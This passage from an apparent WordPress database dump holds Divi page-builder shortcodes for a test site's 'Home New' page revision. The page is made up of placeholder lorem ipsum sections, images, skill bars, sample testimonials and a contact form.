custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:15:43','2020-08-07 20:15:43','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(601,1,'2020-08-07 20:16:31','2020-08-07 20:16:31','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" 